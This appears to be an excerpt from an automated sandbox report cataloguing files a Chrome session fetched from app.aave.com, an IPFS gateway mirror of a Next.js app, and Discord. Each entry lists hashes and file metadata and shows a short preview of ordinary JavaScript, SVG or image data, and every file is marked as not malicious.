                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/4815-7cc90f45fe6229bd.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4815],{25563:function(e,t,r){r.d(t,{hu:function(){return Z},gO:function(){return C},tF:function(){return M}});var n=r(59499),o=r(49501),i=r(61782),a=r(30120),s=r(72389),c=r(62097),l=r(61225),u=r(82334),d=r(81645),p=r(29630),x=r(31538),h=r(61702),b=r(67294),f=r(78371),g=r(57609),m=r(46930),j=r(63206),v=r(34637),k=r(59379),y=r(85893);function O(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function w(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?O(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):O(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var F,Z=functio
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1911385
                                                                                                                                                                                                                                                  Entropy (8bit):5.557673347281288
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fpyXnndDIMWe/EWGYUIS6gieDaGJEuI6tw3INniY9qom+T3UU/80IH9X:WhE6
                                                                                                                                                                                                                                                  MD5:13561A4654CC8B06683612DC0FF1540B
                                                                                                                                                                                                                                                  SHA1:30BBD47E5FC84B8635E08437E70B6D27E68E6C7E
                                                                                                                                                                                                                                                  SHA-256:33146D959F04782E645DB81EC629732A5AB1AACC5D26D2AA721B9119411BD742
                                                                                                                                                                                                                                                  SHA-512:A6F347E5A3C282281CC781A1E47405553915015711EEDD91944DD3C7434560C764BE520D171AB7E73D27FD2E23DC364EBB9871025EB1DCDE9E4FCDA357560609
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{W:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internalType:"address",name:"stkAave",type:"address"},{internalType:"address",name:"ethUsdPriceFeed",type:"address"},{internalType:"address",name:"aaveUsdPriceFeed",type:"address"}],stateMutability:"nonpayable",type:"constructor"},{inputs:[],name:"AAVE_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"ETH_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"STAKED_AAVE",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[{internalType:"address",name:"stakedAsset",type:"address"},{internalType:"address",name:"oracle",type:"address"}],name:"getStakedAssetData",outputs:[{components:[{internalType:"uint256",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):108771
                                                                                                                                                                                                                                                  Entropy (8bit):5.456108298118131
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:AvttUyAUaYOiBOa6FX7ypsI1uEY4beDZ+x:fgl1umbeDZI
                                                                                                                                                                                                                                                  MD5:E10ED53584C556D5C73F04186BC13EFB
                                                                                                                                                                                                                                                  SHA1:88AC82DA5AF4B2759FDDE946A04E71DB569D07B2
                                                                                                                                                                                                                                                  SHA-256:327121E38649354C64B29A32281150A3357F30DCF3F174048E8EFC16432E99A5
                                                                                                                                                                                                                                                  SHA-512:B219BE636BE5F6ED7CCFAB40BEB54D537DE3D1775A9FABE97E674877C4A7A14337CEF802B65D0BF8A3F43B8B2B9E01860DB44580B4A437AA7F9028AAD20B7A71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/pages/index-92ce489f6f7c51ed.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{60478:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return en}});var n=r(49501),o=r(30120),i=r(29630),s=r(67294),a=r(34637),l=r(59379),c=r(46930),d=r(78371),u=r(45745),p=r(15446),b=r(59631),x=r(77537),h=r(75331),m=r(62097),y=r(61225),v=r(75084),j=r(11163),f=r(68861),w=r(57609),g=r(59499),C=r(80854),O=r(1279),k=r(82403),P=r(14379),D=r(45884),Z=r(99435),S=r(1475),A=r(69331),B=r(14795),T=r(43629),I=r(41551),E=r(69125),M=r(81902),R=r(25049),N=r(45556),U=r(46839),Y=130,F=160,L=130,V=function(e,t,r,n,o){return e?W(t,r,n,o||!1):_(t,r,n,o||!1)},W=function(e,t,r,n){return"symbol"===e?z(!0,t,r):"usageAsCollateralEnabledOnUser"===e||"debt"===e?r.sort((function(t,r){return Number(t[e])-Number(r[e])})):(n&&r.sort((function(e,t){return"Variable"===e.borrowRateMode?Number(t.reserve.variableBorrowAPY)-Number(e.reserve.variableBorrowAPY):Number(t.reserve.stableBorrowAPY)-Number(e.reserve.stableBorrowAPY)})),r.sort((function
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):139
                                                                                                                                                                                                                                                  Entropy (8bit):4.710597482771287
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+lFAATcvdnmFFSDDmJS4RKb5KGMXf/FGc8qQAGrqLW:t6Abli/m03mc4sldMX9QAw
                                                                                                                                                                                                                                                  MD5:72A8B168AD2C7EEA7B2559B5690C7695
                                                                                                                                                                                                                                                  SHA1:85E4F43154EA713C832BA27128A33EB7B2A7CF7A
                                                                                                                                                                                                                                                  SHA-256:1F988D1AD4AB163D61A584254C07D75F3241EB6380BF48BF7D8F981E13C092CD
                                                                                                                                                                                                                                                  SHA-512:11BCB1A3623B97C9DD2F22D0389B3CA05AB4F99596DE5D07C50C1FC83F7532D8C20B58379C54C38F503D86D8C2CAF52AF3B35FFCCDC4750089ABAF86C1C5294E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/2597d11c1e039607373e.svg
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9409), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):9409
                                                                                                                                                                                                                                                  Entropy (8bit):5.353629589621163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:1bx8Tv4FjvU38boY/fueb+lcHLKgUDagy1LmH7x5NOoY81to:1bgojvmWqU+EKtDa71Kbso7w
                                                                                                                                                                                                                                                  MD5:66209AC8267B3487FA17882D711FE99B
                                                                                                                                                                                                                                                  SHA1:94AAD8486E7C50B3B1A99F276721D89F2CD0B752
                                                                                                                                                                                                                                                  SHA-256:703AB1B4CA92F8EF672D5A42B7C1FF8082DE83294A20BB9098828D6E2B8E8A41
                                                                                                                                                                                                                                                  SHA-512:B62C7CCCBD3928076F94D116E89CAEF3EB4F04FE4BA6E5A57C303A8C8771F1B407E8E32D955553E1C606B0E8BE13A36C42D3BF19D93C0271788A0DD608D8D140
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/4609-45f4815a9c085248.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4609],{89722:function(e,t,n){"use strict";n.d(t,{Z:function(){return b}});var r=n(87462),o=n(63366),i=n(67294),s=n(86010),a=n(94780),c=n(81719),l=n(78884),u=n(36622),f=n(34867);function p(e){return(0,f.Z)("MuiIcon",e)}(0,n(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=n(85893);const v=["baseClassName","className","color","component","fontSize"],m=(0,c.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,"inherit"!==n.color&&t[`color${(0,u.Z)(n.color)}`],t[`fontSize${(0,u.Z)(n.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1153
                                                                                                                                                                                                                                                  Entropy (8bit):7.762903038973767
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:u6Wak8tPjYJtY1B65ugx6c1Pm4ZestyoQlLNlbwflO2QHuWT8wj+U:7HrYJt40xu4croQlLNlr2vPJU
                                                                                                                                                                                                                                                  MD5:68C9C2A88E45178139F66A748A39272F
                                                                                                                                                                                                                                                  SHA1:252E29BBE84BEE5B977FBCB36D8881A0D902F11F
                                                                                                                                                                                                                                                  SHA-256:AA94366A2BE71C76622A011FFE33FC59A9275FACC8BED3B7F257D9FFF5326FE2
                                                                                                                                                                                                                                                  SHA-512:6EA3D92426841D1FFFC229D4DD7C62951955C551A4685E9560B07B41447A285ED0120CC7B8C5FB0C420BF00A3C4202F0626469E32FDC199EBB90C5A39E284DFD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/favicon32.ico
                                                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... ...........HIDATx.4...@....X.m.....l.[.p.D+ ^.RE*.'s92.!Ji...kq....#.N............s.s.o....v0....p......>}.'\~.dGZr@...l.....x.N.i.(pG..3...r......c.........I8..q....9.....;~....+O...#.m.m.....{m...v&....2Qg^...../uo....W...O........r..~...5...~....$oM)W.r....b.:..{..."...ou...z....I..V.....94.SB..S...2.GY..l*..81..#.W....).p........O.3..y.k.C[.W.....b.....(...d...}\..>c.1....~.|.'.Sb.B..j...+...}r.+..Q.=....D#/...y.d..J.A._.H.9z.L.8.....y.6b.K|_YR........U....rL........"..C"N...b.........n.&.`......7.X..+.J.B.U...T..R...mC..?...g.8.;....o.R...,g_.M....P.E..h..`.O......8J........Z.=.5...N..X.4.sn..Z.7...=y....A.5....+...5.3.O...n.;.N~.s......-.vg.d...nm..Q...\.7Z...gc..J.?.A.9.......u|...!....J.1..|...W..AtcK......t.h.|`v..9...T.....N.<G7..`...od.>..Y.|P8LV...p..#k..k..oh...#7.|p....A.).].%8S.3.5..5......wT3.v.@.5....&.R...y......s.ph.. .x.|U.cb..>,....sty.......8......_....~..f...}.]..a..Q...6..:.J ....
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):379473
                                                                                                                                                                                                                                                  Entropy (8bit):5.5060736443916785
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:x+EQG4J/uhbzIYzgXJl4YYmeu9p0E3xHiHBvnR7cW/6p9wkxcKT4D2nGa0idEsn8:x14whbzIrl6hvnR7cWicknTg270fDa6z
                                                                                                                                                                                                                                                  MD5:9CB0E86CFDA35472FA6009492CB300B7
                                                                                                                                                                                                                                                  SHA1:0012A92D13ADB1F1BA164BCBC5904A2A72CB18D1
                                                                                                                                                                                                                                                  SHA-256:EAD78DFBDFF281D7FED47E998E6F0673A34ABED6F2B9B2E6DD923B7E08F7398F
                                                                                                                                                                                                                                                  SHA-512:52C52A3010CB79813E9D456EC565F12418FCDC98E1BA13F8342872D53549DE46C97E98EFB04F444396373F2B7DB453A979DDF40B531615D51BA33AEE612ACB2A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/4822.4432b8c54d409362.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4822],{56674:function(e,t,r){"use strict";r.d(t,{J:function(){return w},c:function(){return A}});let n=!1,i=!1;const o={debug:1,default:2,info:2,warning:3,error:4,off:5};let s=o.default,a=null;const u=function(){try{const e=[];if(["NFD","NFC","NFKD","NFKC"].forEach((t=>{try{if("test"!=="test".normalize(t))throw new Error("bad normalize")}catch(r){e.push(t)}})),e.length)throw new Error("missing "+e.join(", "));if(String.fromCharCode(233).normalize("NFD")!==String.fromCharCode(101,769))throw new Error("broken implementation")}catch(e){return e.message}return null}();var l,c;!function(e){e.DEBUG="DEBUG",e.INFO="INFO",e.WARNING="WARNING",e.ERROR="ERROR",e.OFF="OFF"}(l||(l={})),function(e){e.UNKNOWN_ERROR="UNKNOWN_ERROR",e.NOT_IMPLEMENTED="NOT_IMPLEMENTED",e.UNSUPPORTED_OPERATION="UNSUPPORTED_OPERATION",e.NETWORK_ERROR="NETWORK_ERROR",e.SERVER_ERROR="SERVER_ERROR",e.TIMEOUT="TIMEOUT",e.BUFFER_OVERRUN="BUFFER_OVERRUN",e.NUMERIC_FAULT="
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7563), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7563
                                                                                                                                                                                                                                                  Entropy (8bit):5.333364781559997
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:MAwDrZCCqfi6eD8Fz2EsxR5lX1f+1CLmH7x5NOoYpmso:M/ACq3ecu3fYCKbsoamX
                                                                                                                                                                                                                                                  MD5:F460CEB778DC53433F6B7A7180E4E079
                                                                                                                                                                                                                                                  SHA1:217FABAA6AE79BA83E3ED5ED6E346D9CA8DC7A92
                                                                                                                                                                                                                                                  SHA-256:11DEB44D4C369B95C0EC4AF748694662F47410B01368FD4550B2CD2D62A9717B
                                                                                                                                                                                                                                                  SHA-512:6673A33E57B3A39CE1F209A461C8F3A3CB662C45914939B95876B09120D80284F03DB1C9E02479B35A5891238CAB0E3118025FCFDBD7A03360B9CB3BB524A44B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1e3],{64288:function(e,t,n){n.d(t,{Z:function(){return w}});var r=n(63366),o=n(87462),i=n(67294),s=n(86010),a=n(28320),l=n(34867),u=n(94780),c=n(29628),d=n(13264),p=n(66500),m=n(85893);const h=["className","component","disableGutters","fixed","maxWidth","classes"],f=(0,p.Z)(),b=(0,d.Z)("div",{name:"MuiContainer",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,t[`maxWidth${(0,a.Z)(String(n.maxWidth))}`],n.fixed&&t.fixed,n.disableGutters&&t.disableGutters]}}),v=e=>(0,c.Z)({props:e,name:"MuiContainer",defaultTheme:f});var x=n(36622),g=n(81719),S=n(78884);const y=function(e={}){const{createStyledComponent:t=b,useThemeProps:n=v,componentName:c="MuiContainer"}=e,d=t((({theme:e,ownerState:t})=>(0,o.Z)({width:"100%",marginLeft:"auto",boxSizing:"border-box",marginRight:"auto",display:"block"},!t.disableGutters&&{paddingLeft:e.spacing(2),paddingRight:e.spacing(2),[e.breakpoints.up("sm")]:{paddingLeft:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):180
                                                                                                                                                                                                                                                  Entropy (8bit):4.921485085907038
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+ZacvTnARcLnkDmJS4RKb5KVErcHYWNTWi7eLFOyTIXGUNfHFQJJqGrqL0:t6AbZ/Ikn4mc4slmYWBWzLRI2ylQJAe
                                                                                                                                                                                                                                                  MD5:B1D4C5E276E3AAA8EC41E6014DD572B2
                                                                                                                                                                                                                                                  SHA1:B5B63A8B35223277D75C79B2AABD8221FDA383EB
                                                                                                                                                                                                                                                  SHA-256:7CF5996F7AB483BD985B3DE5BFBCF50A2B22A7B473E8011E5C993D9830AF9D12
                                                                                                                                                                                                                                                  SHA-512:8E4C954D96FBDA407E87FA65859FE758FC83F2DA0C6D7C07824926BFB0BCDF4F40DE057C5DD1D7EE0890C5287D2ED2EC8FDEFBDF317B46FE222339894E0A559B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/5430e9964fe8364e084d.svg
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):137
                                                                                                                                                                                                                                                  Entropy (8bit):4.7861988241054
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+IjSKcvUVYEo0LvDmJS4RKb5KVErcHNDPqdcJqGrqL0:t6AbzUOC3mc4slmNDiiAe
                                                                                                                                                                                                                                                  MD5:7D883BA72B5DBC0229F5D1980205EE34
                                                                                                                                                                                                                                                  SHA1:678BDA23DF97E8B9C3B15E71C41E7B215D043F22
                                                                                                                                                                                                                                                  SHA-256:53A0F1F10860A6E4CF9BD3B4949C5DDE68888DBC96BA0DA1020C5958EFC214A5
                                                                                                                                                                                                                                                  SHA-512:E040F62517C951A0AB2ABC5038F22456E5862166E2A2346345464B9C4B63271CFBD1220BB14D2C39D7FACFD008848ACE682420F1EFE9F4F29265D7177A3C7E16
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/ab03f7053698d417194c.svg
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11118)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11167
                                                                                                                                                                                                                                                  Entropy (8bit):5.53404314133428
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:YLQA29dyFDfqM+eYTlPT06FJLliKriLZcrOWD8yLgkT06oGLBrOhzuM:Gazsql1/4gJGzf
                                                                                                                                                                                                                                                  MD5:DFD13C3F89CC1CDA9DA23A9D33ADD2F6
                                                                                                                                                                                                                                                  SHA1:A5D8AE2CE5C6E94D8A87E88EB1A30D723310A46F
                                                                                                                                                                                                                                                  SHA-256:AB75EB115154D73E0456028F7E035B5102121FE0E6CF4EB5BCF9863BF0BBAF5F
                                                                                                                                                                                                                                                  SHA-512:AAF274A209CB9598756AC33620065A875D199309E7E5A816A0BD6B89755B233B14A63E03E79DBB53951C77ECC39287B098B2267FCA1DECC639BC57F558024322
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/afd372d42c991d346d6b.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["52030"],{48550:function(e,t,s){s.d(t,{P:function(){return l}});var n=s(689938);let l={get webauthn(){return n.Z.Messages.MFA_V2_WEBAUTHN_NAME},get totp(){return n.Z.Messages.MFA_V2_TOTP_NAME},get sms(){return n.Z.Messages.MFA_V2_SMS_NAME},get password(){return n.Z.Messages.MFA_V2_PASSWORD_NAME},get backup(){return n.Z.Messages.MFA_V2_BACKUP_NAME}}},124860:function(e,t,s){s.d(t,{Cd:function(){return f},YR:function(){return S}}),s(47120),s(411104);var n=s(735250),l=s(470079),i=s(481060),r=s(447097),o=s(873124),a=s(248902),d=s(160511),u=s(51693),c=s(973810),h=s(689938);function f(e){var t,s;let{mfaChallenge:h,mfaFinish:f,onEarlyClose:m,onClose:S,width:_=440}=e,[g,x]=l.useState(null!==(s=null===(t=h.methods[0])||void 0===t?void 0:t.type)&&void 0!==s?s:"select"),[E,C]=l.useState(g),p=async e=>{let{mfaType:t,data:s}=e;await f({mfaType:t,data:s,ticket:h.ticket}),null!=S&&S()},v={mfaChallenge:h,finish:p,setSli
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29637), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29637
                                                                                                                                                                                                                                                  Entropy (8bit):5.565821903446819
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:qyP66F6xI8VecZU+tJI7OzrgtRtAabGlhFvFUfb2Vz/JGbk:iD3eD+DIazwfG
                                                                                                                                                                                                                                                  MD5:7CFB0663518DEFE6ECDAE056D58A67FC
                                                                                                                                                                                                                                                  SHA1:9317D9C28765D914C9D314B523A9D1CC64D242C2
                                                                                                                                                                                                                                                  SHA-256:48ED860A4168C30C71947E753682BFDD30E2B84D1A22AC237D9F617E9EB6A217
                                                                                                                                                                                                                                                  SHA-512:7904510661D3977BB4DBBBE0A74DC56C2CA09CC5C52DE74D74804AA01B05A9947F04B67B1F0BAFD571514F053CA498F96A57D61FF2AC08C03BFCE253A43CE634
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8882.78d4e9d7872de2c1.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8882,6504],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","cl
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2058
                                                                                                                                                                                                                                                  Entropy (8bit):4.614306214221163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:CVHe7HtOty0VulV1/8CXP0Cjek7aj4clug9ai:iANEyxx8UPTXaj4cogIi
                                                                                                                                                                                                                                                  MD5:E1349377226366F95F85AB9EAC4586D3
                                                                                                                                                                                                                                                  SHA1:9A3A00B6E6AB0A240363F4E4DB2F5288227FF76B
                                                                                                                                                                                                                                                  SHA-256:2CA673A9914A35A230469A8A0FD6B4DB293B236DEA391633B53339AFE577A92E
                                                                                                                                                                                                                                                  SHA-512:7C16967D1960CDE4914F71B6FE347A7764AAED42366A87920597D225F3874B5B34A00C5089564BEBF0A919C419049DB99B27128CC81BC28A1492460FD199F9E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve">. <defs>. <clipPath id="a" clipPathUnits="userSpaceOnUse">. <path d="M0 36h36V0H0v36Z"/>. </clipPath>. <mask id="b">. <g>. <rect x="0" y="0" width="100" height="100" fill="white" />. <path d="M11.708 29.849a1.296 1.296 0 1 0-2.591-.001 1.296 1.296 0 0 0 2.591 0" fill="black"/>. </g>. </mask>. </defs>. <g>. <g>. <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)">. <g>. <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474 6 26.459 6h-15.71C6.607 6 3.727 13.224 6.75 17.438c0 0 4.5 3.5 6 .812" fill="white"/>. </g>. <g>. <path d="M13.008 17.864C8.02 10.927 6.968 6 10.75 6c-4.142 0-6.577 6.187-4.468 11.031.463 1.064 1.758 2.492 1.758 2.492l4.18.008c.162-.32.598-1.366.79-1.667" fill="white"/>. </g>. <g>. <path d
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10847), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):10847
                                                                                                                                                                                                                                                  Entropy (8bit):5.5294236279994795
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:iyqKFTyZKx5JbuQmeAlNISkhCs4ydzIvYQOEyrKYgiq8f/yD:dcQmVTUhCs4Xd2bk
                                                                                                                                                                                                                                                  MD5:9969F4D371CA5605F2421FF0D3B3CC07
                                                                                                                                                                                                                                                  SHA1:5981EC8B760CB462F36A1E41F6822D2826DA92EB
                                                                                                                                                                                                                                                  SHA-256:ABCC29F4830E08FF4C3A173855C32BB82975AC2F7E3D7E12AD715664561C18F3
                                                                                                                                                                                                                                                  SHA-512:959F001EFEE7213A105129BFE1974E9C5C463A885066610AD19FEE8788CF6AD421875F67CDA90A73BDD287D009A6772FFACB68FA6C22F746B8430C3796DE2FE5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
